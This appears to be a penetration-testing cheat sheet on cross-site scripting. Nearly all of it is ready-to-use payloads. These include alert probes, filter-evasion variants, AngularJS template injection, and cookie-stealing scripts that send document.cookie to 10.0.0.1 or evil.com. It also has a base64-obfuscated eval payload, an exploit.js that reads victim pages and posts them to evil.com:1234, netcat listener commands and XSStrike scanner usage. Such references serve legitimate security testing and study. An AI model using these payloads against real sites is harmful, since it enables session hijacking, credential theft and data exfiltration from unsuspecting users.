XSS (Cross-Site Scripting)
Last modified: 2023-05-14
XSS enables attackers to injection client-side scripts into web applications.
Payloads
We can insert them into URL params, POST params or HTTP headers.
<script>alert(1)</script>
"><script>alert(1)</script>
<script>alert(1)</script>
"><script>alert(1)</script>
'></script><script>alert(1)</script>
';alert(1);'
" src=1 onerror=alert(1)>
<><img src=1 onerror=alert(1)>
"><img src=1 onerror=alert(1)>
"></span><img src=1 onerror=alert(1)>
"><svg onload=alert(1)>
javascript:alert(1)
\"-alert(1)//
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
<a onmouseover=alert(1)>click</a>
" onmouseleave='alert(1)'">
<img src="jav ascript:alert(1)">
<img src="jav	ascript:alert(1)">
<img src="jav
ascript:alert(1)">
</textarea><script>alert(1)</script>
<script>fetch('/profile?new_password=password');</script>
/?q=&subparam=--><script>alert(1)</script>
/index.php#value='><script>alert(1)</script>
<iframe src=http://10.0.0.1:8000></iframe>
JQuery
https://vulnerable.com/#<img src=1 onerror=alert(1)>
<iframe src="https://vulnerable.com/#" onload="this.src+='<img src=1 onerror=alert(1)>'">
AngularJS
If you find "<html ng-app>" or "<div ng-app>" in the HTML source code, you may be able to abuse it by XSS.
https://vulnerable.com/?search={{$on.constructor('alert(1)')()}}
Cookie Stealing
Create the following payload for stealing Cookie and inject into target web page.
<!-- GET request -->
<script>fetch("http://10.0.0.1/?"+btoa(document.cookie));</script>
<!-- POST request -->
<script>
fetch("http://10.0.0.1/", {
method: 'POST',
mode: 'no-cors',
body: document.cookie
});
</script>
Start web server or listener in local machine.
sudo python3 -m http.server 80
# or
sudo nc -lvp 80
Filter Evasion
Base64 & Eval
Website may sanitize inputs to prevent from malicious code. However, we might be able to circumvent by modifying our code.
For example, change JavaScript code to Base64 string.
fetch("http://evil.com/"+document.cookie);
# Base64: ZmV0Y2goImh0dHA6Ly9ldmlsLmNvbS8iICsgZG9jdW1lbnQuY29va2llKTs=
Insert the base64 string into the “eval” function as below.
# '(' => '\x28'
# ')' => '\x29'
<img src="x" onerror=eval.call`${"eval\x28atob`ZmV...2EoZCkpKQo=`\x29"}`
Interact with Another Host via XML HTTP Request
We might be able to send request the another host and retrieve the response.
First, create a JavaScript file named exploit.js here. Replace http://evil.com with your local ip address.
By this script, we send a request to http://sub.victim.com then fetch the response from the host.
- GET Request
// exploit.js
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = () => {
if (xhr.readyState == XMLHttpRequest.DONE) {
var xhr_exfil = new XMLHttpRequest();
xhr_exfil.open('POST', "http://evil.com:1234/", false);
xhr_exfil.send(xhr.response);
}
};
xhr.open('GET', "http://victim.com/index.php", false);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send();
- POST Request
// exploit.js
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = () => {
if (xhr.readyState == XMLHttpRequest.DONE) {
var xhr_exfil = new XMLHttpRequest();
xhr_exfil.open('POST', "http://evil.com:1234/", false);
xhr_exfil.send(xhr.response);
}
};
xhr.open('POST', "http://victim.com/login.php", false);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send("username=admin&password=admin");
Now we start web server to host the exploit.js and listener to receive the response.
# Terminal 1: Web server
sudo python3 -m http.server 80
# Terminal 2: Listener
sudo nc -lvp 1234
Then send a request with XSS to execute our payload (exploit.js).
Replace the evil.com with your local ip address.
<script src="http://evil.com/exploit.js"></script>
We might fetch the response.
Automation
XSStrike is a XSS scanner.
# GET request
python xsstrike.py -u http://vulnerable.com/?param=test
# POST reqeust
python xsstrike.py -u http://vulnerable.com/post --data "username=test&email=test&comment=test"
# data as JSON
python xsstrike.py -u http://vulnerable.com/comment --data '{"comment": "test"}' --json
